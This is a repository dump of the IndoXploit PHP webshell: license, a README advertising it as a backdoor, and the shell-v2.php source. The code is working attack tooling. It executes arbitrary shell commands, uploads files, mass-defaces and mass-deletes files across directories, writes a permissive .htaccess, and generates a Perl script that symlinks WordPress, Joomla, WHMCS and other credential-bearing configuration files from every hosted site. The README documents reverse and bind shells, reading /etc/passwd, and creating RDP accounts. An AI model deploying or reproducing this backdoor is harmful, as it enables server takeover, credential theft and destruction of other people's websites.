├── LICENSE ├── README.md ├── screenshot ├── idx-interface.PNG ├── indoxploit-login.PNG └── ss.txt ├── shell-v2.php └── shell-v3.php /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 ZAFKIEL.net 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IndoXploit Webshell V.3 2 | 3 | IndoXploit webshell V.3 is an PHP based webshell or backdoor with unique and usefull features. This webshell is originally coded by [**agussetyar**](https://github.com/agussetyar) from **IndoXploit Coders Team**. IndoXploit Shell has been mentioned repeatedly by the coder that it will make you easily bypass server security. With this shell you can comfortably bypass the server firewall from most secure servers. It is one of the hacker's most preferred backdoor shell. 4 | 5 | **Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program** 6 | 7 | --- 8 | 9 | ## Screenshot 10 | - login 11 | ![idx](https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/screenshot/indoxploit-login.PNG "Login Shell") 12 | Default Password : **IndoXploit** 13 | 14 | - interface 15 | ![idx](https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/screenshot/idx-interface.PNG "Shell Interface") 16 | Webshell Interface 17 | 18 | ## Features 19 | - Mass Password Change 20 | - Fake Root 21 | - Cpanel Crack 22 | - Mass Deface/Delete File 23 | - Zone-H Mass Submit 24 | 25 | ## How to Use 26 | - ***Read File*** 27 | ~~~ 28 | usage: rf [filename] 29 | example: rf /etc/passwd 30 | ~~~ 31 | 32 | - Spawn File/Tools 33 | ~~~ 34 | usage: spawn [name] 35 | ~~~ 36 | 37 | [name] 38 | - Adminer (adminer) 39 | - WebConsole (webconsole) 40 | - CGI Telnet 1 (cgitelnet1) 41 | - CGI Telnet 2 (cgitelnet2) 42 | - PHPINFO (phpinfo) 43 | 44 | example: 45 | ~~~ 46 | spawn adminer 47 | spawn webconsole 48 | spawn cgitelnet1 49 | ~~~ 50 | 51 | - ***Jumping*** 52 | ~~~ 53 | usage: jumping 54 | ~~~ 55 | 56 | - ***Config Grabber*** 57 | ~~~ 58 | usage: idxconfig 59 | ~~~ 60 | 61 | - ***Symlink*** 62 | ~~~ 63 | usage: symlink 64 | ~~~ 65 | 66 | - ***Reverse Shell*** 67 | 68 | ***[Back Connect]*** 69 | ~~~ 70 | usage: rvr bc [IP] [PORT] [TYPE] 71 | ~~~ 72 | Example: 73 | ~~~ 74 | rvr bc 127.0.0.1 1337 bash 75 | rvr bc 127.0.0.1 1337 perl 76 | ~~~ 77 | 78 | ***Bind Port*** 79 | ~~~ 80 | usage: rvr bp [PORT] [TYPE] 81 | ~~~ 82 | Example: 83 | ~~~ 84 | rvr bp 1337 perl 85 | ~~~ 86 | 87 | - ***KRDP - Create RDP Account (for windows server only)*** 88 | ~~~ 89 | usage: krdp 90 | ~~~ 91 | - ***Logout From Shell*** 92 | ~~~ 93 | usage: logout 94 | ~~~ 95 | - ***Kill Backdoor*** 96 | ~~~ 97 | usage: killme 98 | ~~~ 99 | 100 | ## Contribute 101 | Drop an email at **shu@indoxploit.or.id** and tell us what your suggestions about how to improve this webshell. 102 | 103 | ## Article 104 | - [Download Shell Backdoor IndoXploit V.3](https://exploit.linuxsec.org/download-shell-backdoor-indoxploit-v-3/) 105 | - [Download Shell backdoor Indoxploit V.2](https://exploit.linuxsec.org/shell-indoxploit-v2-dirilis/) 106 | - [Download IndoXploit WebShell First Edition](https://exploit.linuxsec.org/indoxploit-shell-v1/) 107 | 108 | ## Disclaimer 109 | Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question. 110 | 111 | Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by writing this tool (indoxploit team) 112 | -------------------------------------------------------------------------------- /screenshot/idx-interface.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xAsuka/indoxploit-shell/4c6fc969f80a7ca73f7e8751730253a6bb7f29ba/screenshot/idx-interface.PNG -------------------------------------------------------------------------------- /screenshot/indoxploit-login.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xAsuka/indoxploit-shell/4c6fc969f80a7ca73f7e8751730253a6bb7f29ba/screenshot/indoxploit-login.PNG -------------------------------------------------------------------------------- /screenshot/ss.txt: -------------------------------------------------------------------------------- 1 | dd 2 | -------------------------------------------------------------------------------- /shell-v2.php: -------------------------------------------------------------------------------- 1 | 28 | 29 | 30 | IndoXploit 31 | 53 | 54 |
55 |
56 |
  57 |  ___________________________
  58 | < root@indoxploit:~# w00t??? >
  59 |  ---------------------------
  60 |    \         ,        ,
  61 |     \       /(        )`
  62 |      \      \ \___   / |
  63 |             /- _  `-/  '
  64 |            (/\/ \ \   /\
  65 |            / /   | `    \
  66 |            O O   ) /    |
  67 |            `-^--'`<     '
  68 |           (_.)  _  )   /
  69 |            `.___/`    /
  70 |              `-----' /
  71 | <----.     __ / __   \
  72 | <----|====O)))==) \) /====
  73 | <----'    `--' `.__,' \
  74 |              |        |
  75 |               \       /
  76 |         ______( (_  / \______
  77 |       ,'  ,-----'   |        \
  78 |       `--{__________)        \/
  79 | 
  80 | 	
81 |
82 |
83 | 84 |
85 | 107 | 108 | 109 | IndoXploit 110 | 111 | 112 | 186 | 187 | ".$perm.""; 198 | } else { 199 | return "".$perm.""; 200 | } 201 | } 202 | function r($dir,$perm) { 203 | if(!is_readable($dir)) { 204 | return "".$perm.""; 205 | } else { 206 | return "".$perm.""; 207 | } 208 | } 209 | function exe($cmd) { 210 | if(function_exists('system')) { 211 | @ob_start(); 212 | @system($cmd); 213 | $buff = @ob_get_contents(); 214 | @ob_end_clean(); 215 | return $buff; 216 | } elseif(function_exists('exec')) { 217 | @exec($cmd,$results); 218 | $buff = ""; 219 | foreach($results as $result) { 220 | $buff .= $result; 221 | } return $buff; 222 | } elseif(function_exists('passthru')) { 223 | @ob_start(); 224 | @passthru($cmd); 225 | $buff = @ob_get_contents(); 226 | @ob_end_clean(); 227 | return $buff; 228 | } elseif(function_exists('shell_exec')) { 229 | $buff = @shell_exec($cmd); 230 | return $buff; 231 | } 232 | } 233 | function perms($file){ 234 | $perms = fileperms($file); 235 | if (($perms & 0xC000) == 0xC000) { 236 | // Socket 237 | $info = 's'; 238 | } elseif (($perms & 0xA000) == 0xA000) { 239 | // Symbolic Link 240 | $info = 'l'; 241 | } elseif (($perms & 0x8000) == 0x8000) { 242 | // Regular 243 | $info = '-'; 244 | } elseif (($perms & 0x6000) == 0x6000) { 245 | // Block special 246 | $info = 'b'; 247 | } elseif (($perms & 0x4000) == 0x4000) { 248 | // Directory 249 | $info = 'd'; 250 | } elseif (($perms & 0x2000) == 0x2000) { 251 | // Character special 252 | $info = 'c'; 253 | } elseif (($perms & 0x1000) == 0x1000) { 254 | // FIFO pipe 255 | $info = 'p'; 256 | } else { 257 | // Unknown 258 | $info = 'u'; 259 | } 260 | // Owner 261 | $info .= (($perms & 0x0100) ? 'r' : '-'); 262 | $info .= (($perms & 0x0080) ? 'w' : '-'); 263 | $info .= (($perms & 0x0040) ? 264 | (($perms & 0x0800) ? 's' : 'x' ) : 265 | (($perms & 0x0800) ? 'S' : '-')); 266 | // Group 267 | $info .= (($perms & 0x0020) ? 'r' : '-'); 268 | $info .= (($perms & 0x0010) ? 'w' : '-'); 269 | $info .= (($perms & 0x0008) ? 270 | (($perms & 0x0400) ? 's' : 'x' ) : 271 | (($perms & 0x0400) ? 'S' : '-')); 272 | // World 273 | $info .= (($perms & 0x0004) ? 'r' : '-'); 274 | $info .= (($perms & 0x0002) ? 'w' : '-'); 275 | $info .= (($perms & 0x0001) ? 276 | (($perms & 0x0200) ? 't' : 'x' ) : 277 | (($perms & 0x0200) ? 'T' : '-')); 278 | return $info; 279 | } 280 | function hdd($s) { 281 | if($s >= 1073741824) 282 | return sprintf('%1.2f',$s / 1073741824 ).' GB'; 283 | elseif($s >= 1048576) 284 | return sprintf('%1.2f',$s / 1048576 ) .' MB'; 285 | elseif($s >= 1024) 286 | return sprintf('%1.2f',$s / 1024 ) .' KB'; 287 | else 288 | return $s .' B'; 289 | } 290 | function ambilKata($param, $kata1, $kata2){ 291 | if(strpos($param, $kata1) === FALSE) return FALSE; 292 | if(strpos($param, $kata2) === FALSE) return FALSE; 293 | $start = strpos($param, $kata1) + strlen($kata1); 294 | $end = strpos($param, $kata2, $start); 295 | $return = substr($param, $start, $end - $start); 296 | return $return; 297 | } 298 | function getsource($url) { 299 | $curl = curl_init($url); 300 | curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 301 | curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); 302 | curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); 303 | curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); 304 | $content = curl_exec($curl); 305 | curl_close($curl); 306 | return $content; 307 | } 308 | function bing($dork) { 309 | $npage = 1; 310 | $npages = 30000; 311 | $allLinks = array(); 312 | $lll = array(); 313 | while($npage <= $npages) { 314 | $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); 315 | if($x) { 316 | preg_match_all('#

ON" : "OFF"; 375 | $ds = @ini_get("disable_functions"); 376 | $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; 377 | $curl = (function_exists('curl_version')) ? "ON" : "OFF"; 378 | $wget = (exe('wget --help')) ? "ON" : "OFF"; 379 | $perl = (exe('perl --help')) ? "ON" : "OFF"; 380 | $python = (exe('python --help')) ? "ON" : "OFF"; 381 | $show_ds = (!empty($ds)) ? "$ds" : "NONE"; 382 | if(!function_exists('posix_getegid')) { 383 | $user = @get_current_user(); 384 | $uid = @getmyuid(); 385 | $gid = @getmygid(); 386 | $group = "?"; 387 | } else { 388 | $uid = @posix_getpwuid(posix_geteuid()); 389 | $gid = @posix_getgrgid(posix_getegid()); 390 | $user = $uid['name']; 391 | $uid = $uid['uid']; 392 | $group = $gid['name']; 393 | $gid = $gid['gid']; 394 | } 395 | echo "System: ".$kernel."
"; 396 | echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
"; 397 | echo "Server IP: ".$ip." | Your IP: ".$_SERVER['REMOTE_ADDR']."
"; 398 | echo "HDD: $used / $total ( Free: $freespace )
"; 399 | echo "Safe Mode: $sm
"; 400 | echo "Disable Functions: $show_ds
"; 401 | echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
"; 402 | echo "Current DIR: "; 403 | foreach($scdir as $c_dir => $cdir) { 404 | echo "
$cdir/"; 412 | } 413 | echo "  [ ".w($dir, perms($dir))." ]"; 414 | echo "
"; 415 | echo "
"; 416 | echo ""; 439 | echo "
"; 440 | echo "
"; 441 | if($_GET['logout'] == true) { 442 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 443 | echo ""; 444 | } elseif($_GET['do'] == 'upload') { 445 | echo "
"; 446 | if($_POST['upload']) { 447 | if($_POST['tipe_upload'] == 'biasa') { 448 | if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { 449 | $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; 450 | } else { 451 | $act = "failed to upload file"; 452 | } 453 | } else { 454 | $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; 455 | $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; 456 | if(is_writable($_SERVER['DOCUMENT_ROOT'])) { 457 | if(@copy($_FILES['ix_file']['tmp_name'], $root)) { 458 | $act = "Uploaded! at $root -> $web"; 459 | } else { 460 | $act = "failed to upload file"; 461 | } 462 | } else { 463 | $act = "failed to upload file"; 464 | } 465 | } 466 | } 467 | echo "Upload File: 468 |
469 | Biasa [ ".w($dir,"Writeable")." ] 470 | home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]
471 | 472 | 473 |
"; 474 | echo $act; 475 | echo "
"; 476 | } elseif($_GET['do'] == 'cmd') { 477 | echo "
478 | ".$user."@".$ip.": ~ $ 479 | 480 |
"; 481 | if($_POST['do_cmd']) { 482 | echo "
".exe($_POST['cmd'])."
"; 483 | } 484 | } elseif($_GET['do'] == 'mass_deface') { 485 | function sabun_massal($dir,$namafile,$isi_script) { 486 | if(is_writable($dir)) { 487 | $dira = scandir($dir); 488 | foreach($dira as $dirb) { 489 | $dirc = "$dir/$dirb"; 490 | $lokasi = $dirc.'/'.$namafile; 491 | if($dirb === '.') { 492 | file_put_contents($lokasi, $isi_script); 493 | } elseif($dirb === '..') { 494 | file_put_contents($lokasi, $isi_script); 495 | } else { 496 | if(is_dir($dirc)) { 497 | if(is_writable($dirc)) { 498 | echo "[DONE] $lokasi
"; 499 | file_put_contents($lokasi, $isi_script); 500 | $idx = sabun_massal($dirc,$namafile,$isi_script); 501 | } 502 | } 503 | } 504 | } 505 | } 506 | } 507 | function sabun_biasa($dir,$namafile,$isi_script) { 508 | if(is_writable($dir)) { 509 | $dira = scandir($dir); 510 | foreach($dira as $dirb) { 511 | $dirc = "$dir/$dirb"; 512 | $lokasi = $dirc.'/'.$namafile; 513 | if($dirb === '.') { 514 | file_put_contents($lokasi, $isi_script); 515 | } elseif($dirb === '..') { 516 | file_put_contents($lokasi, $isi_script); 517 | } else { 518 | if(is_dir($dirc)) { 519 | if(is_writable($dirc)) { 520 | echo "[DONE] $dirb/$namafile
"; 521 | file_put_contents($lokasi, $isi_script); 522 | } 523 | } 524 | } 525 | } 526 | } 527 | } 528 | if($_POST['start']) { 529 | if($_POST['tipe_sabun'] == 'mahal') { 530 | echo "
"; 531 | sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); 532 | echo "
"; 533 | } elseif($_POST['tipe_sabun'] == 'murah') { 534 | echo "
"; 535 | sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); 536 | echo "
"; 537 | } 538 | } else { 539 | echo "
"; 540 | echo "
541 | Tipe Sabun:
542 | BiasaMassal
543 | Folder:
544 |
545 | Filename:
546 |
547 | Index File:
548 |
549 | 550 |
"; 551 | } 552 | } elseif($_GET['do'] == 'mass_delete') { 553 | function hapus_massal($dir,$namafile) { 554 | if(is_writable($dir)) { 555 | $dira = scandir($dir); 556 | foreach($dira as $dirb) { 557 | $dirc = "$dir/$dirb"; 558 | $lokasi = $dirc.'/'.$namafile; 559 | if($dirb === '.') { 560 | if(file_exists("$dir/$namafile")) { 561 | unlink("$dir/$namafile"); 562 | } 563 | } elseif($dirb === '..') { 564 | if(file_exists("".dirname($dir)."/$namafile")) { 565 | unlink("".dirname($dir)."/$namafile"); 566 | } 567 | } else { 568 | if(is_dir($dirc)) { 569 | if(is_writable($dirc)) { 570 | if(file_exists($lokasi)) { 571 | echo "[DELETED] $lokasi
"; 572 | unlink($lokasi); 573 | $idx = hapus_massal($dirc,$namafile); 574 | } 575 | } 576 | } 577 | } 578 | } 579 | } 580 | } 581 | if($_POST['start']) { 582 | echo "
"; 583 | hapus_massal($_POST['d_dir'], $_POST['d_file']); 584 | echo "
"; 585 | } else { 586 | echo "
"; 587 | echo "
588 | Folder:
589 |
590 | Filename:
591 |
592 | 593 |
"; 594 | } 595 | } elseif($_GET['do'] == 'config') { 596 | $idx = mkdir("idx_config", 0777); 597 | $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin"; 598 | $htc = fopen("idx_config/.htaccess","w"); 599 | fwrite($htc, $isi_htc); 600 | fclose($htc); 601 | if(preg_match("/vhosts|vhost/", $dir)) { 602 | $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); 603 | $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
